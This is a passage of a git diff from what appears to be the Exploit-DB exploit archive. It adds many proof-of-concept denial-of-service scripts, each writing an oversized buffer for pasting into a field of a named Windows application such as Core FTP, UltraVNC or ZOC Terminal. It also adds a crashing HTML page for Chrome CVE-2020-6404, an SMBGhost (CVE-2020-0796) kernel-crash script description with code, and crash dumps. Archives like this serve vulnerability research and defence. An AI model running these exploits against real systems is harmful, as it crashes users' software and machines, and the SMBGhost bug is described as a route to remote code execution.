+            print(msg)
+
+main()
+
+"""
+0:010> kb7
+ # ChildEBP RetAddr  Args to Child              
+00 06bbf4d4 77ebc1f5 77df50e4 8ae27015 01471640 ntdll!RtlpValidateHeapEntry+0x61114
+01 06bbf51c 77e6b325 06bc0048 01471640 772e0f80 ntdll!RtlDebugSizeHeap+0xb3
+02 06bbf53c 772e0f9b 013b0000 00000000 06bc0048 ntdll!RtlSizeHeap+0x45775
+03 06bbf550 76640be7 773fcf44 06bc0048 00000008 combase!CRetailMalloc_GetSize+0x1b [onecore\com\combase\class\memapi.cxx @ 702] 
+04 06bbf574 766408cd 06bc0048 01471760 00451f4c OLEAUT32!APP_DATA::FreeCachedMem+0x37
+05 06bbf5a8 0041ec27 06bbf5bc 05ec4fe4 05ec4f50 OLEAUT32!VariantClear+0x20d
+WARNING: Stack unwind information not available. Following frames may be wrong.
+06 06bbf5c4 766408cd 76cd0008 0907a724 01471254 quickweb+0x1ec27
+
+0:010> !analyze -v
+<SNIP>
+STACK_TEXT:  
+00000000 00000000 heap_corruption!quickweb.exe+0x0
+SYMBOL_NAME:  heap_corruption!quickweb.exe
+MODULE_NAME: heap_corruption
+IMAGE_NAME:  heap_corruption
+STACK_COMMAND:  ** Pseudo Context ** ManagedPseudo ** Value: 7ba5870 ** ; kb
+FAILURE_BUCKET_ID:  HEAP_CORRUPTION_80000003_heap_corruption!quickweb.exe
+OS_VERSION:  10.0.17763.1
+BUILDLAB_STR:  rs5_release
+OSPLATFORM_TYPE:  x86
+OSNAME:  Windows 10
+FAILURE_ID_HASH:  {68efeb37-77bb-f968-fc16-9a1fba88436f}
+"""
\ No newline at end of file
diff --git a/exploits/windows/dos/48132.py b/exploits/windows/dos/48132.py
new file mode 100755
index 000000000..366640f70
--- /dev/null
+++ b/exploits/windows/dos/48132.py
@@ -0,0 +1,27 @@
+# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
+# Date: 2020-24-02
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.nsauditor.com/
+# Software Link: http://www.nsauditor.com/spotftp.html
+# Version: 2.4.8
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+#STEPS
+# Open the program SpotFTP-FTP Password Recover
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "RandomLetter.txt"
+# Click in the  Enter Registration Code
+# In the field Key put the content of the file "RandomLetter.txt"
+# End :)
+
+buffer = 'Z' * 1000
+
+try: 
+    file = open("RandomLetter.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/48133.py b/exploits/windows/dos/48133.py
new file mode 100755
index 000000000..c0ada5cdb
--- /dev/null
+++ b/exploits/windows/dos/48133.py
@@ -0,0 +1,32 @@
+# Exploit Title: aSc TimeTables 2020.11.4 - Denial of Service (PoC)
+# Date: 2020-24-02
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.asctimetables.com/#!/home
+# Software Link: https://www.asctimetables.com/#!/home/download
+# Version: 2020.11.4
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+# STEPS
+# Open the program aSc Timetables 2020
+# In File select the option New
+# Put any letter in the fiel Name of the Schooland click Next
+# In the next Windows click NEXT
+# In the Step 3, in Subject click in New 
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Tables.txt"
+# Paste the content in the field Subject title
+# Click in OK
+# End :)
+
+
+buffer = 'Z' * 1000
+
+try: 
+    file = open("Tables.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/48136.py b/exploits/windows/dos/48136.py
new file mode 100755
index 000000000..e6ede85fe
--- /dev/null
+++ b/exploits/windows/dos/48136.py
@@ -0,0 +1,32 @@
+# Exploit Title : Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)
+# Exploit Author : Berat Isler
+# Date : 2020-02-25
+# Vendor Homepage : https://odin-secure-ftp-expert.jaleco.com/
+# Software Link Download :
+http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
+# Version : Odin Secure FTP Expert 7.6.3
+# Tested on : Windows 7 32-bit
+
+# First step , run exploit script, it will generate a new file with the
+name "bune.txt"
+# Then start Odin Secure FTP application and find the "connect" tab . After
+that you can click
+Quickconnect site tab.
+# After that paste the content of "bune.txt" in to the all fields like this
+--> "AAAAAA" than click connect button
+# Application will be crash .
+
+This is the generated payload code :
+
+#!/usr/bin/python
+
+bune = "A" * 6000
+payload = bune
+try:
+f=open("bune.txt","w")
+print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created "
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48137.py b/exploits/windows/dos/48137.py
new file mode 100755
index 000000000..8b2ad8e7f
--- /dev/null
+++ b/exploits/windows/dos/48137.py
@@ -0,0 +1,32 @@
+# Exploit Title: Core FTP LE 2.2 - Denial of Service (PoC)
+# Date: 2020-25-02
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.coreftp.com/
+# Software Link: http://www.coreftp.com/download.html
+# Version: 2.2 build 1947
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+#STEPS
+# Open the program Core FTP LE
+# In File select the option Connect
+# Click in the option Advanced from the fiel Host / IP / URL
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Dog.txt"
+# Paste the content in the field Account
+# Click in OK
+# After Core FTP lE closed, the program did not work again if the user try to
+# open again, so it is necessary uninstall and install again
+# End :)
+
+
+buffer = 'R' * 20000
+
+try: 
+    file = open("Dog.txt","w")
+    file.write(buffer)
+    file.close()
+
+    print("Archive ready")
+except:
+    print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/48216.md b/exploits/windows/dos/48216.md
new file mode 100644
index 000000000..5e1d56281
--- /dev/null
+++ b/exploits/windows/dos/48216.md
@@ -0,0 +1,29 @@
+# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip
+
+## Usage
+
+`./CVE-2020-0796.py servername`
+
+This script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.
+
+This contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.
+
+The compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.
+
+```python
+    def _compress(self, b_data, session):
+        header = SMB2CompressionTransformHeader()
+        header['original_size'] = len(b_data)
+        header['offset'] = 4294967295
+        header['data'] = smbprotocol.lznt1.compress(b_data)
+```
+
+## About
+
+CVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).
+
+Once a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.
+
+CVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.
\ No newline at end of file
diff --git a/exploits/windows/dos/48237.txt b/exploits/windows/dos/48237.txt
new file mode 100644
index 000000000..3a85250a3
--- /dev/null
+++ b/exploits/windows/dos/48237.txt
@@ -0,0 +1,82 @@
+# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2020-02-21
+# Exploit Author: Cem Onat Karagun of Diesec GmBH
+# Vendor Homepage: https://www.google.com/
+# Version: Google Chrome 80.0.3987.87
+# Tested on: Windows x64 / Linux Debian x64 / MacOS
+# CVE: CVE-2020-6404
+# PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8
+# Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256
+
+Thread 35 "Chrome_InProcRe" received signal SIGSEGV, Segmentation fault.
+[Switching to Thread 0x7f2cbf9ad700 (LWP 3275)]
+[----------------------------------registers-----------------------------------]
+RAX: 0x7f2cbe98d100 --> 0x41b58ab3
+RBX: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
+RCX: 0x1fffffffffffffff
+RDX: 0x7f2cbeb8bdf4 --> 0x0
+RSI: 0x7f2cbeb8bdc0 --> 0x613000000000 --> 0xcc6e96b9 --> 0x0
+RDI: 0x0
+RBP: 0x7f2cbf9aaa70 --> 0x7f2cbf9aabf0 --> 0x7f2cbf9aad10 -->
+0x7f2cbf9aadd0 --> 0x7f2cbf9aaea0 --> 0x7f2cbf9aafb0 (--> ...)
+
+RSP: 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
+RIP: 0x559e50c11189 (<RangeFromBufferIndex()+377>: mov cl,BYTE PTR
+[rcx+0x7fff8000])
+R8 : 0xfffffffffffffff8
+R9 : 0x0
+R10: 0x7f2cbec6a670 --> 0x7f2cbec6a070 --> 0xd47000000000000 ('')
+R11: 0x7f2cbe98d100 --> 0x41b58ab3
+R12: 0xfe597d31a20 --> 0x0
+R13: 0x7f2cbeb8bde8 --> 0x0
+R14: 0x0
+R15: 0x2
+EFLAGS: 0x10a06 (carry PARITY adjust zero sign trap INTERRUPT direction
+OVERFLOW)
+[-------------------------------------code-------------------------------------]
+0x559e50c1117e <RangeFromBufferIndex()+366>: lea r8,[rdi-0x8]
+0x559e50c11182 <RangeFromBufferIndex()+370>: mov rcx,r8
+0x559e50c11185 <RangeFromBufferIndex()+373>: shr rcx,0x3
+=> 0x559e50c11189 <RangeFromBufferIndex()+377>: mov cl,BYTE PTR
+[rcx+0x7fff8000]
+0x559e50c1118f <RangeFromBufferIndex()+383>: test cl,cl
+0x559e50c11191 <RangeFromBufferIndex()+385>:
+jne 0x559e50c11418 <RangeFromBufferIndex()+1032>
+0x559e50c11197 <RangeFromBufferIndex()+391>: add
+rdi,0xffffffffffffffff
+0x559e50c1119b <RangeFromBufferIndex()+395>: mov rcx,rdi
+[------------------------------------stack-------------------------------------]
+0000| 0x7f2cbf9aa9c0 --> 0xfe597d7178d --> 0x0
+0008| 0x7f2cbf9aa9c8 --> 0xc0c001162e6 --> 0x0
+0016| 0x7f2cbf9aa9d0 --> 0xfe597d717be --> 0x0
+0024| 0x7f2cbf9aa9d8 --> 0xfe597d717bd --> 0x0
+0032| 0x7f2cbf9aa9e0 --> 0x7f2cbeb8bdf4 --> 0x0
+0040| 0x7f2cbf9aa9e8 --> 0x7f2cbeb8bea0 --> 0x6060008b1720 -->
+0x602000098630 --> 0x200000003 --> 0x0
+
+0048| 0x7f2cbf9aa9f0 --> 0x21bec4d308 --> 0x0
+0056| 0x7f2cbf9aa9f8 --> 0xfe597cfab48 --> 0x0
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+Stopped reason: SIGSEGV
+0x0000559e50c11189 in MappingForIndex ()
+at
+../../third_party/blink/renderer/core/editing/finder/find_buffer.cc:450
+450
+../../third_party/blink/renderer/core/editing/finder/find_buffer.cc: No
+such file or directory.
+
+
+<!DOCTYPE html>
+<head>
+<script type="text/javascript">
+document.addEventListener("DOMContentLoaded", function(){
+find(decodeURIComponent('\uFFFC'));
+});
+</script>
+</head>
+<body>
+<legend></legend>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/windows/dos/48259.py b/exploits/windows/dos/48259.py
new file mode 100755
index 000000000..8adc0c170
--- /dev/null
+++ b/exploits/windows/dos/48259.py
@@ -0,0 +1,21 @@
+# Exploit Title: Everest 5.50.2100 - 'Open File' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2020-03-24
+# Software Link : http://www.lavalys.com/
+# Tested Version: 5.50.2100
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Home Single Language
+
+# Steps to produce the crash:
+#1.- Run python code: Everest.py
+#2.- Open Everest.txt and copy content to clipboard
+#3.- Open "Everest Ultimate Edition"
+#4.- Select "Informe" > "Asistente de Informes" > "Next" > Select "Abrir Archivo"
+#5.- In "Abrir Archivo" field paste Clipboard
+#6.- Select "Next"
+#7.- Crashed
+
+buffer = "\x41" * 450
+f = open ("Everest.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48262.py b/exploits/windows/dos/48262.py
new file mode 100755
index 000000000..98179dd17
--- /dev/null
+++ b/exploits/windows/dos/48262.py
@@ -0,0 +1,25 @@
+# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2020-03-27
+# Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/
+# Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
+# Version : Odin Secure FTP Expert 7.6.3
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Home Single Lenguage (ESP)
+
+Steps to Produce the Crash:
+
+   1.- Run python code: OdinSecureFTP.py
+   2.- Copy content to clipboard
+   3.- Open "OdinSecureFTPExpert.exe"
+   4.- Go to "Trial" > Connect > Quickconnect site
+   5.- Paste ClipBoard into the all fields
+   6.- Go to Connect
+   7.- Crashed
+
+Python "OdinSecureFTP" Code:
+   
+buffer = "\x41" * 108
+f = open ("OdinSecureFTP.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48269.py b/exploits/windows/dos/48269.py
new file mode 100755
index 000000000..52489b1b4
--- /dev/null
+++ b/exploits/windows/dos/48269.py
@@ -0,0 +1,29 @@
+# Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC) 
+# Vendor Homepage: https://www.flashfxp.com/ 
+# Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-03-30
+# Vulnerable Software: FlashFXP
+# Version: 4.2.0 Build 1730
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on: Windows 10 Pro (64 bit) 
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: FlashCrash.py
+#   2.- Copy content to clipboard
+#   3.- Open "FlashFXP.exe"
+#   4.- Go to "Options" > Filters > Skip List > New Entry
+#   5.- Paste ClipBoard into the "Mask" field
+#   6.- Click on OK
+#   7.- Go to "Options" > Filters > Skip List
+#   8.- Crashed
+
+#################################################################################################################################################
+
+#Python "FlashCrash.py" Code:
+   
+buffer = "\x41" * 300
+f = open ("FlashCrash.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48276.py b/exploits/windows/dos/48276.py
new file mode 100755
index 000000000..4d8f714eb
--- /dev/null
+++ b/exploits/windows/dos/48276.py
@@ -0,0 +1,28 @@
+# Exploit Title: DiskBoss 7.7.14 - Denial of Service (PoC) 
+# Date: 2020-04-01
+# Exploit Author: Paras Bhatia
+# Vendor Homepage: https://www.diskboss.com/ 
+# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
+# Vulnerable Software: DiskBoss
+# Version: 7.7.14
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: DiskbossCrash.py
+#   2.- Copy content to clipboard
+#   3.- Open "diskboss.exe" (diskbsg.exe)
+#   4.- Go to "Command" > Search Files
+#   5.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
+#   6.- Click on " Add Input Directory"
+#   7.- Paste ClipBoard into the "Directory" field
+#   8.- Click on OK
+#   9.- Crashed
+
+#Python "DiskbossCrash.py" Code:
+   
+buffer = "\x41" * 7000
+f = open ("DiskbossCrash.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48284.py b/exploits/windows/dos/48284.py
new file mode 100755
index 000000000..a91229f95
--- /dev/null
+++ b/exploits/windows/dos/48284.py
@@ -0,0 +1,35 @@
+# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
+# Discovery by: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Tested Version: 4.2.2.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+
+# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers.
+
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+    f=open("POC.txt","w")
+    print "[+] Creating %s bytes payload.." %len(buff)
+    f.write(buff)
+    f.close()
+    print "[+] POC created!"
+except:
+    print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48285.py b/exploits/windows/dos/48285.py
new file mode 100755
index 000000000..12369a016
--- /dev/null
+++ b/exploits/windows/dos/48285.py
@@ -0,0 +1,36 @@
+# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
+# Exploit Author: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: https://www.spotauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe
+# Tested Version: 5.3.4
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+
+# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords, 
+# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook 
+# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20 
+# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms.
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run SpotAuditor  and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+    f=open("POC.txt","w")
+    print "[+] Creating %s bytes payload.." %len(buff)
+    f.write(buff)
+    f.close()
+    print "[+] POC created!"
+except:
+    print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48286.py b/exploits/windows/dos/48286.py
new file mode 100755
index 000000000..ce265c73f
--- /dev/null
+++ b/exploits/windows/dos/48286.py
@@ -0,0 +1,39 @@
+# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
+# Discovery by: 0xMoHassan
+# Date: 2020-04-04
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.2.0.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows XP - SP3
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, 
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that 
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing 
+# software significantly reduces the total cost of network management in enterprise environments by enabling 
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without 
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+
+# PoC
+# 1.Run the python script, it will create a new file "POC.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of POC.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Magic happen :)
+
+
+
+#!/usr/bin/env python
+buff = "\x41" *500
+buff += "\x41" * 500
+
+try:
+    f=open("POC.txt","w")
+    print "[+] Creating %s bytes payload.." %len(buff)
+    f.write(buff)
+    f.close()
+    print "[+] POC created!"
+except:
+    print "POC cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/48287.py b/exploits/windows/dos/48287.py
new file mode 100755
index 000000000..01d5a7147
--- /dev/null
+++ b/exploits/windows/dos/48287.py
@@ -0,0 +1,26 @@
+# Exploit Title: Frigate 3.36 - Denial of Service (PoC) 
+# Date: 2020-04-05
+# Exploit Author: inter
+# Vendor Homepage: http://www.Frigate3.com/
+# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
+# Vulnerable Software: Firgate
+# Version: 3.36
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)  
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: crash.py
+#   2.- Copy content to clipboard
+#   3.- Open "Frigate3.exe"
+#   4.- Go to "Disk" > Find Computer
+#   5.- Paste ClipBoard into the "Computer Name:" field
+#   6.- Click on OK
+#   7.- Crashed
+
+#Python "crash.py" Code:
+   
+buffer = "\x41" * 2000
+f = open ("Frigate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48288.py b/exploits/windows/dos/48288.py
new file mode 100755
index 000000000..e0a122ff7
--- /dev/null
+++ b/exploits/windows/dos/48288.py
@@ -0,0 +1,23 @@
+# Exploit Title:  UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
+# Discovery by: chuyreds 
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
+#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Repeater host" Paste Clipboard
+#6.- Click on "OK"
+#7.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48290.py b/exploits/windows/dos/48290.py
new file mode 100755
index 000000000..eee1b4ddc
--- /dev/null
+++ b/exploits/windows/dos/48290.py
@@ -0,0 +1,24 @@
+# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+#Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
+#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
+#3.- Open UltraVNC Launcher
+#4.- Select "Properties"
+#5.- In "Password" Paste Clipboard
+#6.- Click on "OK"
+#7.- Click on "Propieties"
+#8.- Crashed
+
+cod = "\x41" * 300
+
+f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48291.py b/exploits/windows/dos/48291.py
new file mode 100755
index 000000000..f926016a6
--- /dev/null
+++ b/exploits/windows/dos/48291.py
@@ -0,0 +1,22 @@
+# Exploit Title:  UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
+# Discovery by: chuyreds 
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.uvnc.com/
+# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
+# Tested Version: 1.2.4.0
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
+#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
+#3.- Open UltraVNC Viewer 
+#4.- In "VNC Server" Paste Clipboard
+#5.- Click on "Connect"
+#6.- Crashed
+
+cod = "\x41" * 256
+
+f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48292.txt b/exploits/windows/dos/48292.txt
new file mode 100644
index 000000000..7155a42ed
--- /dev/null
+++ b/exploits/windows/dos/48292.txt
@@ -0,0 +1,22 @@
+# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
+#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
+#3.- Open ZOC Terminal
+#4.- Select File > Create SSH Key Files... 
+#5.- Select "Private key file:" field erease and Paste ClipBoard 
+#6.- Click on "Create public/private key files..."
+#7.- Crashed
+
+buffer = "\x41" * 2000
+f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/48302.py b/exploits/windows/dos/48302.py
new file mode 100755
index 000000000..1f658e2bd
--- /dev/null
+++ b/exploits/windows/dos/48302.py
@@ -0,0 +1,21 @@
+# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2020-04-05
+# Vendor Homepage: https://www.emtec.com
+# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
+# Tested Version: 7.25.5
+# Vulnerability Type: Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to produce the crash:
+# 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx"
+# 2.- Open ZOC Terminal
+# 3.- Select Script > Start REXX Script... 
+# 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open"
+# 5.- Crashed
+
+cod = "\x41" * 20000
+
+f = open('ZOC_7.25.5_Script.zrx', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/38382.py b/exploits/windows/local/38382.py
index 42b56350a..24661b35c 100755
--- a/exploits/windows/local/38382.py
+++ b/exploits/windows/local/38382.py
@@ -3,8 +3,6 @@
 # Date: 2 Oct 2015
 # Exploit Author: ex_ptr
 # Vendor Homepage: http://mini-stream.net
-# Software Link: http://www.topvideopro.com/download/ASXtoMP3Converter.exe
-http://www.topvideopro.com/mp3wav/asx-mp3.htm
 # Version: 1.82.50
 # Tested on: Windows XP SP3
 '''
diff --git a/exploits/windows/local/40863.txt b/exploits/windows/local/40863.txt
index 83b87cbe9..7f122f310 100644
--- a/exploits/windows/local/40863.txt
+++ b/exploits/windows/local/40863.txt
@@ -6,6 +6,7 @@
 
 [+] ISR: ApparitionSec
 
+[+] CVE: CVE-2019-0948
 
 
 Vendor:
diff --git a/exploits/windows/local/46416.txt b/exploits/windows/local/46416.txt
index 0da86f017..93a82fd40 100644
--- a/exploits/windows/local/46416.txt
+++ b/exploits/windows/local/46416.txt
@@ -6,7 +6,7 @@
 # Software Link: 
 # Version: 1.6.2.0 (May affect other versions)
 # Tested on: Win 10 64 bit
-# CVE : None
+# CVE : CVE-2019-15084
 
 MaxxAudio licenses their driver technology to OEMs and is commonly installed on Dell Laptops (and others) as part of other driver installations.
 
diff --git a/exploits/windows/local/46636.py b/exploits/windows/local/46636.py
index c057e044a..b5362d67c 100755
--- a/exploits/windows/local/46636.py
+++ b/exploits/windows/local/46636.py
@@ -1,5 +1,5 @@
 #!/usr/bin/python                                                                                         #
-# Exploit Title: AIDA64 Extreme 5.99.4800 - SEH Buffer Overflow (EggHunter)                               #
+# Exploit Title: AIDA64 Extreme 5.99.4900 - SEH Buffer Overflow (EggHunter)                               #
 # Date: 2019-04-01                                                                                        #
 # Vendor Homepage: https://www.aida64.com                                                                 #
 # Software Link: http://download.aida64.com/aida64extreme599.exe                                          #
@@ -11,14 +11,14 @@
 # The program has SEH Buffer Overflow in several places.(this code show one of them)                      #
 # Note 1 : To optimize code, I've used a "stack pivot" that is the same in                                #
 # (Extreme, Engineer, Network Audit) Editions.                                                            #
-# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4800                           #
+# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900                           #
 # But the stack pivots in Business Edition are different.                                                 #
